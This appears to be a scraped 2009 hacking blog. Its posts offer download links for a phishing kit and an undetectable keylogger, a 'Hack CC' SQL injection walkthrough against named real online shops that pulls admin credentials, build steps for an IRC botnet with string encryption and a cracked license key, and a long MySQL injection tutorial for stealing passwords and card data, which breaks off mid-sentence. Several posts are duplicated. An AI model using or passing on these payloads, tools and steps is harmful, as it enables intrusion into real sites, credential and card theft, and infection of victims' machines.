RS PHIS
http://rapidshare.com/files/208908371/RSP_v3_TES_mOD_By_Need4Weed.rar
Wednesday, April 1, 2009
RS PHIS
Here You Go This is a phisher modded With The new Phisher warning
RS PHIS
RS PHIS
Avhackers Keylogger 1.0, 99% FUD
Features:
1. Completely Stealth (FUD)
2. Intuitive Interface
3. Application Monitoring
4. Password Recording
5. Messenger Recording
6. Keyboard Recording
7. Stealth Email Recording
8. Hot Keys to hide and unhide the keylogger application
Download Link [Including Video Tutorial]
1. Completely Stealth (FUD)
2. Intuitive Interface
3. Application Monitoring
4. Password Recording
5. Messenger Recording
6. Keyboard Recording
7. Stealth Email Recording
8. Hot Keys to hide and unhide the keylogger application
Download Link [Including Video Tutorial]
http://rapidshare.com/files/209957263/Avhackers_Keylogger_1.0_By_Dsuraj_www.Avhackers.com.rar
Thursday, February 5, 2009
Wednesday, February 4, 2009
Hack CC
first go to google.com and put this
inurl:/shopdisplayproducts.asp
ok, now we find some site with shopdisplayproducts.asp
let see some site
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
ok … now we put on end of link this sign ‘
now link look like this
Code:
http://www.globalasp.org.uk/store/shopdisp….asp?id=14
'
and we get error
products
microsoft jet database engine error ‘80040e14'
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
if we see this error then is hackable ) !!!
ok … now we removed ‘
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’
link now is
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and put it in the browser we get the same error !!!
ok … now you see this numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
now we removed ,50
and we now test
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
the same error and now we removed and removed number, and when we don’t see this error we must see some site, on this server correct number for
exploit is -> 47 <-
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
—> this you see 47 is the end number
ok now we put this in browser and don’t see error we see some laptops
ok … now we find on that site numbers 3 and 4
they are small
when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
now explotable link is this
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and look where was 3 and 4 number now there are username and password for
login in shopadmin , now we are going to this link
http://www.globalasp.org.uk/store/colours$config.a sp
there is login for shopadmin and we login !!!
this are path where can be shopadmins too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
Code:
http://www.publishamerica.com/shopping/
... 20tbluser'
Code:
http://msponline.net/shopping/shopadmin.asp
Love Is Blind.......
inurl:/shopdisplayproducts.asp
ok, now we find some site with shopdisplayproducts.asp
let see some site
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
ok … now we put on end of link this sign ‘
now link look like this
Code:
http://www.globalasp.org.uk/store/shopdisp….asp?id=14
'
and we get error
products
microsoft jet database engine error ‘80040e14'
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
if we see this error then is hackable ) !!!
ok … now we removed ‘
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’
link now is
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and put it in the browser we get the same error !!!
ok … now you see this numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
now we removed ,50
and we now test
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
the same error and now we removed and removed number, and when we don’t see this error we must see some site, on this server correct number for
exploit is -> 47 <-
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
—> this you see 47 is the end number
ok now we put this in browser and don’t see error we see some laptops
ok … now we find on that site numbers 3 and 4
they are small
when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
now explotable link is this
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and look where was 3 and 4 number now there are username and password for
login in shopadmin , now we are going to this link
http://www.globalasp.org.uk/store/colours$config.a sp
there is login for shopadmin and we login !!!
this are path where can be shopadmins too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
Code:
http://www.publishamerica.com/shopping/
... 20tbluser'
Code:
http://msponline.net/shopping/shopadmin.asp
Love Is Blind.......
Thursday, January 29, 2009
Java Botnet - Irc
Yes this is a follow up on Bm1 (Is that his name?)
I will be telling you how to compile and jar your botnet as well as editing it.
First off, What is a botnet? This botnet connects to irc to allow the person on the channel to literally take control over the user. He can attack web sites using his bot to do the dirty work. Download files onto the bot(s) PC then add them to the start up. I THINK you can add a shell to this one as well.
Code: Select All
Download the source: http://www.megaupload.com/?d=VC72O61M
Named family photos so they wont delete it.
First off we are going to edit the file "config.php" Fill in all the fields. You need to know how to use IRC for this. Once edited upload it and remember the url so you can view it.
Next we edit "Constants.java" This we can open in notepad to edit. It's pretty easy to edit. Don't worry to much about the backup stuff. Remember the "Config.php" we uploaded? Make sure you put the right path to it.
Right, Easy. Now we need to compile it. Make sure you have Java JDK.
Code: Select All
http://java.sun.com/javase/downloads/index.jsp
First one there.
Now go into your botnet and click "Compile A.bat" If you are unsure about what this bat does right click it and click edit. This lets you see the source of it.
You should now see lots of .class files. If so, Good. Your botnet is now working. Now click "Compile.bat" This will make a "jar" called "jusched.jar" That's your botnet.
To test that it has worked click the jar (There is two I'll explain the other one later) You should join the IRC Channel you told it to. If you kept the nick settings it would be like [BOT] 84073857340 eg.
Not working, Go through it again. To remove your botnet go into start > run > msconfig > startup > jusched.jar and remove and click apply. That will stop the botnet running. In IRC double click to open a private chat between you and the botnet and do the command ".exit" Then you have removed yourself from the botnet.
The botnet jar you make is unencrypted so people could view the details for it. for this i have added "jshrink.jar" Drag the botnet jar onto the window then in the options tab click "Encrypt Strings" For the license code i have attacked it in a file called jshrink or here it is.
Code: Select All
31-12-2099 CANCQJUQKEOQKKLI
Now you have a fully working fully undetected botnet. Enjoy.
To who ever made the source gets full credits for it.
I will be telling you how to compile and jar your botnet as well as editing it.
First off, What is a botnet? This botnet connects to irc to allow the person on the channel to literally take control over the user. He can attack web sites using his bot to do the dirty work. Download files onto the bot(s) PC then add them to the start up. I THINK you can add a shell to this one as well.
Code: Select All
Download the source: http://www.megaupload.com/?d=VC72O61M
Named family photos so they wont delete it.
First off we are going to edit the file "config.php" Fill in all the fields. You need to know how to use IRC for this. Once edited upload it and remember the url so you can view it.
Next we edit "Constants.java" This we can open in notepad to edit. It's pretty easy to edit. Don't worry to much about the backup stuff. Remember the "Config.php" we uploaded? Make sure you put the right path to it.
Right, Easy. Now we need to compile it. Make sure you have Java JDK.
Code: Select All
http://java.sun.com/javase/downloads/index.jsp
First one there.
Now go into your botnet and click "Compile A.bat" If you are unsure about what this bat does right click it and click edit. This lets you see the source of it.
You should now see lots of .class files. If so, Good. Your botnet is now working. Now click "Compile.bat" This will make a "jar" called "jusched.jar" That's your botnet.
To test that it has worked click the jar (There is two I'll explain the other one later) You should join the IRC Channel you told it to. If you kept the nick settings it would be like [BOT] 84073857340 eg.
Not working, Go through it again. To remove your botnet go into start > run > msconfig > startup > jusched.jar and remove and click apply. That will stop the botnet running. In IRC double click to open a private chat between you and the botnet and do the command ".exit" Then you have removed yourself from the botnet.
The botnet jar you make is unencrypted so people could view the details for it. for this i have added "jshrink.jar" Drag the botnet jar onto the window then in the options tab click "Encrypt Strings" For the license code i have attacked it in a file called jshrink or here it is.
Code: Select All
31-12-2099 CANCQJUQKEOQKKLI
Now you have a fully working fully undetected botnet. Enjoy.
To who ever made the source gets full credits for it.
Wednesday, January 28, 2009
MySQL Injection Ultimate Tutorial
MySQL Injection Ultimate Tutorial
Sql Injection is one of the most common web application errors today. It is also one of the most deadliest because it allows remote users to access confidential information such as usernames and credit cards. With databases being the central core of our economy and all of our nations wealth being held in servers that may be able to be compromised by witty hackers, SQL Injection is a problem that needs to be addresses not to let hackers exploit these errors for their own good,pleasure, or challenge but rather to bring awareness to the fact that a simple error caused by a lazy or inexperienced programmer can cause consequences from a simple website deface to the leaking of millions of users financial information. To start this paper out, I provide you with an Outline for MySQL Injection attacks, which will also serve as a table of contents since each section will discuss a separate step in the exploitation process.
MySQL Injection Outline (table of contents):
In Part 1 (this part):
Section 1 - Intro to Basic Database Information
Section 2 – Steps to injections
1)Find out how to close the previous statement & find the right comment to use to end the injection
2)Check for magic quotes
3)Check to see if UNION works
4)Find the number of columns
5)Craft a union statement that doesnt cause an error and see which columns are outputted
6)Check the mysql version to see if information_schema is present
7)Get the desired column and table names
8)Get your data
In Part 2: (not done yet)
Section 1 – Advanced injections
1)Check for load_file()
2)Check for into outfile
3)Ddos the mysql server
4)login page injections
5)Possible failures - multi selects
6)Get past magic quotes - where, concat - no load_file
7)The no spaces bug
8)Getting past filters
9)Blind Injection
10)Advanced NOT IN
Before we start anything about inserting SQL commands and stealing data from columns and tables, we need to discuss the basics and all the terms that will be necessary for fully comprehending this paper. So lets begin this with some basic Database Server Info. By the end of this section you should fully understand the basics of databases and how they function on a user interaction level.
Section 1: Basic Database Information
Database(DB) Servers are servers that hold information. Information is stored in a type of holder called database, which is a certain section of the database that serves as a structured container that stores data in fully organized subsections which enable the quick and efficient withdrawal or insertion of data..
DB Servers can have many databases, each with a different use, such as web, which may hold content displayed or needed for the correct display of webpages open to the public, or intranet, which may include information needed by employees on the inside network of the company, etc. There are many types of database servers, but all are similar which few differences. Some common types are:
1)Mysql
2)MsSQL (Microsoft SQL Server)
3)Oracle
4)Microsoft Access
5)Postgre SQL
etc..
In this tutorial we will discuess one of the two most common, MySql (the other most common is MsSQL, then after that Microsoft Access).
DB's are made up of tables, each which hold a similar type of data such as user info or articles.Tables are made up of columns, which group the data into different types such as usernames, passwords, dates registered, etc.The actual data in a table is in a row, which are inserted into the database and have info for each column in the table - e.g. a username, password, etc
To help visualize visual of a database server would look like this:
Now, to access data from the server you would use SQL - Standard Query Language. This is similar to programming languages in that it has its own set of functions, operators, and syntax. This lets you select certain data that you want and choose the database, table, and columns that you want to access the rows in.
SQL has a set format for selecting data from the database. It looks like this:
SELECT column1,column2 FROM table
This is basically saying to go to table “table” and gets the data stored in columns “column1” and “column2” for all the rows (since the number is not specified, it takes them all. Ill show you how to specify how many next) .
But what if you only wanted two rows? Yes, you could still retrieve all the rows then sort it out with commands in php, but that’s inneficient. Say you wanted the FIRST 2 usernames & passwords from table users of database webinfo (for injections you usually dont have to put the database, its already selected in the code)You would use
Select column_name FROM table_name limit start,number
column_name is the columns you want. if you want two columns, you would do column1,column2.
table_name is the table. If you want to use a table from a different datbase server, you would do database.table
limit start,number tells the server how many rows you want. Say you want the first 2 rows, you would make start 0 (the first row), and put number 2 for two rows. This would basically say go to the first row (0) and give me the next two rows.
If you wanted the next 2 rows after the first two (but only two, not all 4), you would make start 2 since you already got 2 and make number 2 again. (limit 2,2). This would be saying go to the second row and get me the next two rows. If you wanted all four, youwould make start 0 and number 4.
For injections you dont need to know how to get the data out of the query result in php/asp, which usually involve manipulating the arrays returned by the mysql query, since its already done for you in the code of the script youre trying to hack. You just need to find which columns get displayed to the page, which we will discuss later.
Now, say you want to get the password of a user whose username is "bako123". This is used for login systems to check logins. Then you would use:
Select column_name FROM table_name WHERE column_name = 'Value'
For example, if you wanted to the password column from the table users in a row where the username column is bako123 you would do:
Select password FROM users WHERE username = 'bako123'
This would let you retrieve the password of a certain user, bako123. This can be used in many ways, to retrieve a certain article, user information, a certain persons financial information, etc.
If you wanted to get the password of a user where the name was similar to bako, maybe xbako or bakos or xbakos, you would do
Select password FROM users WHERE username LIKE '%bako%'
The % is a wildchar which basically says there can be text in its place, so in this case there can be text before and after bako since there is a % before and after it.
This leads us to the final discussion in this section: Magic Quotes.
Many database servers (or scripts that access them) have magic quotes enabled. This takes quotes like ', which are needed to specify data like for statements like WHERE username = or in functions we will discuss later that load files with a certain filename. Quotes are needed to specify strings. For example, when we did WHERE username LIKE ‘%bako%’, the quotes told the server that the string to search for was %bako%. If there were no quotes, the server wouldn’t take %bako% as a string, and not only would the search fail but the script would return an error because %bako% is out of place.
Magic Quotes prevents quotes from being used in injections by either making the ' (original quote) to \' (backslashed quote) or '' (double quote).
The \' tells the sql server to take away the meaning of the ' and regard it as a normal character in a string. For example, say you wanted to select a password from a user that had a username Bako's. If you did :
Select password FROM users WHERE username = 'bako's'
the ' in bako's would end the username = value statement and make it WHERE username = 'bako'. Then the s' would be stray and cause an error.
So to sepcify that the ' isnt part of the SQL query syntax but just a normal character in a string like the letter b, you can use \ to take its meaning away and make it be considered a normal character by the server.
Another way the server takes the meaning away from ' is by making it ''. Say you wanted to find a user by the name of bako's again, and you put bako's straight into the script, like
Select password FROM users WHERE username = 'bako's'
the script/server would change it to
Select password FROM users WHERE username = 'bako''s'
which would then create two different strings, bako and s, and since the s is out of place and not in a statment( like SELECT col FROM table WHERE col = value) or function it would cause an error too. There is a way to get around this in certain cases, and it will be discussed later. Now that you know basic info on mysql, time to start Injecting!!
Section 2: SQL Injecting to Steal Data
In this section we will cover each of the steps to succesfully exploiting SQL Injection vulnerabilities in web scripts that use mysql. We will go step by step and cover each part thoroughly. By the time you finished this section you should fully understand how to take advantage of SQL Injection vulnerabilities and be able to succesfully retrieve data such as usernames, passwords, financial information, and other assorted confidential data from databases that are used by vulnerable scripts. Well start from the very beginning of determining if the script is vulnerable or not.
Subsection 2.1: Check for Injections
So say you find a script like this and you want to see if its vulnerable to SQL Injection:
http://site.com/script.php?id=1
In order to further demonstrate how this works, lets say you do know what query the script forms (which is usually very unlikely in real-world injections). Lets say it looks like this:
Select title,data FROM news WHERE id =
What that would do is get the title and data info from the news table in a row where the column id was 1.
So, what if we added some sql commands to the id in the url? Like this:
http://site.com/script.php?id=1'
The output depends on the script’s quality. If the script filters the input for sql keywords, or converts the id value to an integer so the keywords don’t get through, or takes any other precaution to ensure that you cant insert sql statements into the query, then no sql error would be returned, and the page will either load normally or give you a warning like “Attack Spotted, Your IP Address has been recorded “ or something similar. However, if the script had no filtering whatsoever and just got the user data for id straight from the URL and inserted it right into the MySQL Query, then you would get an error like this:
"MySQL Syntax Error By '1'' In file script.php On Line 7."
Then you would know that the server does NOT filter input to make sure there are no sql commands/syntax in it and DOES NOT make sure the data is only an integer. Since you got an error, you are SURE that this is SQL Injectable!
Keep in mind that now all sites has errors as verbose as this, some sites have simple errors like “INTERNAL ERROR” or “ERROR” that reveal no useful data. However, you can be reasonably sure that its injectable. To be fully sure, move on to the next step. If all the possibilities fail in the next step, then you now chances are that’s not an sql error but some other type of error.
Now That you have found out its injectable, lets go step by step through my MySQL Injection outline.
Subsection 2.2 - Step 1)Find out how to close the previous statement.
To do this we will use an SQL operator "and". This word lets you specify two criterias that the row must match when searching the table. For example, if you have a WHERE clause, such as
Select user from users where password = 'pass123'
and want to select data not only where the password is 'pass123' but also where the email is 'email@m.com', you would use somethings like this:
Select user from users where password = 'pass123' AND email = 'email@m.com'
This basically tells the server, as we had before, select the data from the user column in a row in table users where the password is pass123 AND the email also is email@m.com. If both of these criteria are not matched, then the script moves on to the next row.
Another operator like AND is OR. An example:
Select user from users where password = ‘pass123’ OR email = ‘email@m.com’
This basically says, instead of making sure the column password is pass123 AND the email is email@m.com, it searches for rows where the password is pass123 or the email is email@m.com. Both don’t have to be present for the row to be chosen. One will do, even if the other doesn’t equal the right value.
Now say you added an and 1=1 to any statment, it would load since 1 always equals 1. This can be very useful from an attackers point of view. It can help us find out how to close the previous query AND can help us to determine is magic quotes are enabled.
Lets say you dont know the query, as you wont in most cases. The query could be anything like:
Select user from users where id = '1'
or
Select user from users where id = (1)
or
Select user from users where id = 1
etc...
In order to add more SQL commands to steal our data (credit cards, usernames, passwords, etc)we need to be able to end the where id = 1 (or '1', (1), etc). To do that we would have to try different possibilities until we get NO error.
In order to add our command, we would also need to know how to get rid of the other data that will come after our injection. For example, if the query was like this:
Select user from users where id = '1'
and we did http://site.com/script.php?id=1' and 1=1 (lets say magic quotes are OFF)
the query would become
Select user from users where id = '1' or 1=1 '
The stray ' after 1=1, which is left over from the '1' before we added our commands, needs to be taken care of or it will cause an error. To do this, we need to use comments to comment out the rest of the code. Two comment operators are /* and --. Sometimes one will cause an error, in that case try the other.
So lets have an full example for this first step in injections.
Say the script was, as i said before:
http://site.com/script.php?id=1
First we would check if its injectable:
http://site.com/script.php?id=1'
It gives - "Error in MySQL Syntax by '1'' in script.php on line 7."
Now you know its injectable. Now lets try to see how to end the WHERE clause.
http://site.com/script.php?id=1 or 1=1 --
This would work if there was no ' surrounded 1, like in
SELECT title FROM news where id = 1
This gives the error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."
Remember, MySQL always surrounds the problem part in the query, in this case 1’ or 1=1 --, with quotes, so don’t let the beginning and end quotes confuse you.
Even though the error shows you that 1 has a ' after it (by '1' or 1=1 --') we will pretend we didnt notice (not all sites have errors like this anyway).
So we would try next
http://site.com/script.php?id=1 or 1=1 /*
same error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."
Now lets try ending it with '. so lets do:
http://site.com/script.php?id=1' or 1=1 /*
now we get the error - "Error in MySQL Syntax by '/*'. in script.php on line 7."
This would show us that either /* isnt supported or this sql server is configured so that it needs a */ to close the comment, which would defeat the purpose of commenting out the code. But since it doesnt give us an error about the ' after id=1, we know were close. So we try the next comment opertaor:
http://site.com/script.php?id=1' or 1=1 --
The page loads normally!!! Now we know we need to end the where clause with ' and add -- to the end to add our sql commands!!
Now we move on to the next step:
Subsection 2.3 - Step 2)Check for magic quotes
We know from our example before that magic quotes are off because we used ' to end the WHERE clause and it gave no error, but lets pretend our first try worked, http://site.com/script.php?id=1 or 1=1 --, so were not sure if ‘ causes an error or not. We need to know if magic quotes is on because if we want to use a function like load_file to steal files (discussed later), or choose data where the user = 'admin', we need to be able to use 's, so magic quotes MUST be off.
To find out if theyre on, we would try:
http://site.com/script.php?id=1 or '1'='1' --
If you get an error like:
"Error in MySQL Syntax by '\'1\'=\'1\''. in script.php on line 7."
or
"Error in MySQL Syntax by '''1''=''1'''. in script.php on line 7."
then you would see that magic quotes are on since its adding \s or an extra ' to the ' you put in. Then you would not be able to steal files if load_file was enabled or choose certain data using WHERE ( there is a way to get around it which I will discuss later, but it doesnt work for load_file, just WHERE and other functions discussed later like concat)
Now if you get no error, you know magic_quotes are off and you have an even bigger advantage. That was easy, wasn’t it? Now lets move on.
Subsection 2.4 - Step 3)Check to see if UNION works
UNION is a function in sql that lets us select more data in a single sql statement. This can be very useful since we need to use it in order to select our own data that we want to steal from the database such as passwords or financial data. To illustrate its use further, heres an example. Say the query was:
SELECT user from users where pass = 'pass'
we could do
SELECT user from users where pass = 'pass' UNION select email from emails limit 0,1
And no error would be displayed. You don’t need to know how it helps get data to the page etc since its not needed to get the injection working.
However, in order to get the data from the UNION SELECT displayed, we would need to make sure the first select statement displays no data at all.If the first select statement does return data, it will overwrite the data from the UNION. We will discuss this later. Also, it is always good to use UNION ALL instead of just UNION, it can prevent type mismatch errors.
Now, UNION is only availabe in mysql server versions above 3 (4,5,6 - 6 is the latest, but 5 is most popular). So in order to steal our data, we need to use union (well, we could use blind injection, but thats a pain in the ass), and in order to use union, the mysql version MUST be > 3.
There is a way to check for the mysql version without union ( 1 and (substr(@@version, 1)>3 )- but its more advanced than the general tone of this tutorial at the moment (ill go over it in a bit), so we will use an easier way. This is to try a union select and judge the error. So we could try:
http://site.com/script.php?id=1' UNION ALL SELECT 1 --
If you get an error like :
"Error in MySQL Syntax by 'UNION'. in script.php on line 7."
Then you know that the server is not understanding what UNION is since its getting an error at the UNION keyword. If you got an error like:
"MySQL Error: Select statements must have the same number of columns in script.php on line 7."
Then you know union worked since it realizes that both selects don’t have the same number of columns, therefore showing that it reads two selects, where ones the original and one our union. Even If we got a different error such as a type conversion, as long as its not saying an error by UNION its ok. For some errors that just show “INTERNAL ERROR” or something similar, it’s a good idea to try the next method.
So, if there arent error messages like this, and just errors like INTERNAL ERROR, then you can use
http://site.com/script.php?id=1' and substr(@@version,1)>3 --
Substr is a function that takes a certain character from a string. @@version gives us the mysql version in a string. So say @@version returned 4.1.33-log, subtr would get the 1st letter in it (the ,1 in substr(@@version,1)), which is 4. Then it checks if 4 is greater than 3 (the >3 part). If it is, the page loads normally. If it doesnt, the page will load with no data (you can get a blank page, or a page with the basic template but no actual data, e.g. no title for the news and no actual news).
Now if UNION works, were in business! Time to move on! if not, you can use blind injection, which will be briefly discussed later in Part 2.
Subsection 2.5 - Step 4)Find the number of columns
This section will fix this error we got before- "MySQL Error: Select statements must have the same number of columns in script.php on line 7.". In order to actually use UNION to steal data, we must make union work first with no error at all so the page can load and display the stolen data.
This error occured because the initial SELECT statement and the UNION ALL SELECT statement we injected had a different number of columns.Whenever you have UNION SELECT (or UNION ALL SELECT), the number of columns must ALWAYS match the number of columns in the first SELECT statement, or you’ll get an error. For example, if the query looked like this:
Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email FROM emails
You will get that error since the first select is selecting two columns (user and pass) while the UNION ALL SELECT is selecting only one (email). So if you did
Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email,id FROM emails
There wouldnt be an error and the query would execute succesfully since the first select statement is selecting two columns (user and pass) and the second select, the union all select, is also selecting two columns (email and id).
Now to get the number of columns in the first select statment, we can do two things:
1) guess the number of columns till you get it right. For example
http://site.com/script.php?id=1' UNION ALL SELECT null --
(null is a data type that means empty. If you used 1 or 'the' - or in other words, an integer or string, you might get a type mismatch error)
If you get an error like "MySQL Error: Select statements must have the same number of columns in script.php on line 7." then you move on to
http://site.com/script.php?id=1' UNION ALL SELECT null,null --
and continue adding a ,null (an extra column) to the URL until you get no error. Then count the nulls and thats the number of columns!
2) use order by - this is WAY easier.
ORDER BY is a statement in SQL that tells the database server how to order the result. For example, if you did
SELECT title,data FROM news WHERE id=1 ORDER BY news ASC
the server would order the all the output in alphabetical order from a-z. If you changed ASC to DESC it would make it z-a.
The server automatically sees if the column is a string or integer. if its a string, it goes alphabetically, and if its an integer, numerically.
ORDER BY also selects numbers instead of columns. The number is the number of the column in the select statement. For example, if the query waas this:
SELECT title,data FROM news WHERE id=1 ORDER BY 1 ASC
It would choose the first column chosen in the query, which is title (it chooses from title, data). Then it orders the result alphabetically from a-z.
If it was
SELECT title,data FROM news WHERE id=1 ORDER BY 2 ASC
It would use the second column selected, data, and order it by that.
So we can take advantage of this and try numbers from 1 on in the URL. Once we hit an error saying that the column is invalid, we know that the last number to NOT give an error is the number of columns. Heres an example:
http://site.com/script.php?id=1' ORDER BY 1 -- no error
http://site.com/script.php?id=1' ORDER BY 2 -- no error
http://site.com/script.php?id=1' ORDER BY 3 -- no error
http://site.com/script.php?id=1' ORDER BY 4 -- error - "MySQL Error: No column number '4' in WHERE clause in script.php on line 7."
So we know that 3, the last number to not give an error, is the number of columns in the first select!
Now lets move on to the next step!
Subsection 2.6 - 5)Craft a union statement that doesnt cause an error & see which columns are outputted
So now that we know the number of columns, we need to make a union statement and see which columns are outputted to the site so we know which columns we can use to retrieve and output our data to the screen. This is generally a two step process.
1)First we craft the union select statement( rememer to use union all) which numbers as the columns. An example:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,3 --
If there is no error, you look at the screen and check which numbers are displayed in the place data would normally be put (for example, in the place where the article title would be, check if a number is there).
If the numbers are on the screen, you know you can use the columns with those numbers to display stolen data. The other columns that arent displayed are useless.
For example, if you see the number 2 in the title of the page and a number 3 where the article is usually displayed, you know that you can use the second and third column (where you put the 2 and 3 in the union all select 1,2,3 --) to display data you will steal from the database to the page.
Now if you get an error when you use all numbers like: "MySQL Error: Cant convert int in script.php on line 7." then you know that one column cant be a number, so you should move to step 2.
2)Since we know that we cant go all out and put all integers, we need to use null. Null never causes a type conversion error since its just an empty data holder. So we try:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --
Now if you can an error, there is a good chance the script has TWO select statements. For example, first it can do
SELECT title,data,author FROM news WHERE id= '[your data from the url]'
then in a later line in the script it uses the id value from the url again in another select statement like this:
SELECT data,time FROM news WHERE id= '[your data from the url]'
Now, the first select statment would be like this:
SELECT title,data,author FROM news WHERE id= '1' UNION ALL SELECT null,null,null --
but the second will be
SELECT date,time FROM news WHERE id = '1' UNION ALL SELECT null,null,null --
This would cause an error since the second query has ONLY TWO columns in the first select statement (time,year), while the union all select has THREE columns. This will cause another error saying select statement need the same number of columns. Now if you change the UNION ALL SELECT to have two nulls, then the first select would cause an error.
Unfortunately, there is no way around this in mysql at the moment. (in mssql there is, however). A good way to double check that its a multi select and not that you messed up the number of columns in the UNION select statement is to cause an error like we did before, doing
http://site.com/script.php?id=1'
Say you got an error like this:
"MySQL Syntax Error By '1'' In file script.php On Line 7."
Then do the union all select url like this:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --
say you get an error like this:
"MySQL Error: Select statements must have the same number of columns in script.php on line 18."
Now look at the two errors. The first is on line 7, and the second on line 18. Now that you know that two separate lines of code caused the error, you know that two separate queries caused the error and it is infact a multi select, which you cant get around.
Keep in mind that not all sites have errors that verbose. Some just say "error". Then you would have to double check the columns and make sure you didnt make a mistake.
So lets say there is no multi select. We left off at :
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --
Now there is no error. So we try this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,null,null --
We check for two things: an error, and if no error is displayed, check if the number 1 is displayed on the page in a place it wasnt before, like the title or where the news or author would be.
Say you get the same error as before in step 1:
"MySQL Error: Cant convert int in script.php on line 7."
Then you know that the first column causes an error, and you should ignore it and switch it back to null.
If it happens that all the columns cause errors or arent displayed on the page, you can come back and test it with 'test' instead of 1 and see if it displays text or still gives a conversion error. If you get no error AND the word test is displayed on the page, you can then go further and get usernames/passwords and any other text based data, but not data that are integers like dates and credit cards.
So now that we know 1 causes an error, we move on and check column two after we switch 1 back to null.
http://site.com/script.php?id=1' UNION ALL SELECT null,2,null --
Now look at the screen. Lets say there is an error. So now we know that 2 also causes an error and cant be used.
So lets change 2 back to null and try 3.
http://site.com/script.php?id=1' UNION ALL SELECT null,null,3 --
and guess what - no error! now check the page for the number 3. Check any places such as the title bar in your browser and places where data was like where the news was orthe author or date. If you dont find anything, dont give up, make the number unique like 1232323132 and view the source and see if its displayed in any hidden tags.
If its not displayed, as i said before, you can go back to the other two and try strings like 'test' (as long as magic quotes are disabled, or your getting around them like i will explain later), and check if those are displayed.
So now we are left with:
http://site.com/script.php?id=1’ UNION ALL SELECT null,null,3 –
and we know we can use the 3rd column to display our stolen data! So lets move on to step 6:
Subsection 2.7 - Step 6)Check the mysql version to see if information_schema is present
This is an easy step!
Information_Schema is a part of the database that holds ALL of the table names and column names stored in that database. You can access it like any other table.
To get tables, you would use information_schema.tables like this:
select table_name from information_schema.tables
This would return all of the tables that exist in the database.
To get columns you would use information_schema.columns
select column_name from information_schema.columns
This would return all the column names in all the tables of the database.
Information_schema.columns also holds the table names, so you can switch column_name with table_name and use it to get tables too.
Now this luxury is only available in mysql version 5 and up (6). So to make sure we can use it, we need to use the @@version command to check the version. So lets take our url and change 3 with @@version.
http://site.com/script.php?id=1' UNION ALL SELECT null,null,@@version --
Now, check where the 3 was before to see the version.
If the version is like 4.0.22-log, then the mysql version is 4 and you cant use information_schema.tables, but if its 5.0.1, then you can use information_schema.tables! You can also use the substring method I described before.
Now lets move on to step 7:
Subsection 2.8 – Step 7) Retrieve the desired columns
If the version is aboveor equal to 5, we can scan information_schema for password (or credit card, etc) columns. If not, we have to guess and use clues given to us in errors to find prefixes, tables and columns that we want to steal data from. So for the first part lets assume that information_schema is enabled.
Now we need to scan information_schema for columns that are similar to pass, password, user_pass, etc. ( you can change it around so it will be creditcard, address, phone number, etc)
So, we need to use information_schema.columns and the LIKE operator along with wildchars (%) as i discussed in the basic info section.
So if we were putting queries straight into the db server, it would look like this:
SELECT column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'
(of course, magic quotes will have to be off. If they're on, you will learn how to get past them later on)
For our vulnerable site, it would look like this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' –
The LIKE ‘%pass%’ is telling the server to scan make sure column_name has a value that is similar to “pass” and can have text before and after it (the wildchars). So it could be pass, userpass, password, etc.
This will return the first column_name that is like pass, with text before and after it (from the wildchars before and after it).
Now say you want the table_name the columns in so you can access it with union. You would simply change column_name to table_name like this:
